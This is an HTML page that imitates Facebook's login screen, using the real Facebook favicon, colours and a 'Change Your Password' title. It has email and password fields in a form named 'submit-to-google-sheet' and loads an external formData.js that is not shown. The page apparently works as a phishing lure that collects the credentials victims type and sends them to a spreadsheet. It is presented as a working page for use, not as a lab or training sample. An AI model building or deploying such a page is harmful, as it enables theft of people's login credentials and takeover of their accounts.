<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login to Facebook | Change Your Password</title>
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yT/r/aGT3gskzWBf.ico" type="image/x-icon">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .login-container {
            background-color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            text-align: center;
        }
        .login-container h1 {
            color: #1877f2;
            font-size: 36px;
            margin-bottom: 20px;
        }
        .login-container input {
            width: 90%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #dddfe2;
            border-radius: 4px;
            font-size: 16px;
        }
        .login-container button {
            width: 95%;
            padding: 10px;
            background-color: #1877f2;
            border: none;
            border-radius: 5px;
            color: white;
            font-size: 16px;
            cursor: pointer;
            transition: 0.4s;
        }
        .login-container button:hover {
            background-color: #4d74ab;
        }
        .login-container a {
            color: #1877f2;
            text-decoration: none;
            display: inline-block;
            margin: 10px 0;
        }
        .login-container a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <h1>facebook</h1>
        <form name="submit-to-google-sheet">
            <input name="Email or Phone" type="email" placeholder="Email address or phone number" required>
            <input name="Password" type="password" placeholder="Password" required>
            <button id="btnSubmit" type="submit">Log In</button>
        </form>
        <a href="https://www.facebook.com/login">Forgotten account?</a>
        <a href="facebook-signup.html">Sign up for Facebook</a>
    </div>
    <script src="formData.js"></script>
</body>
</html>
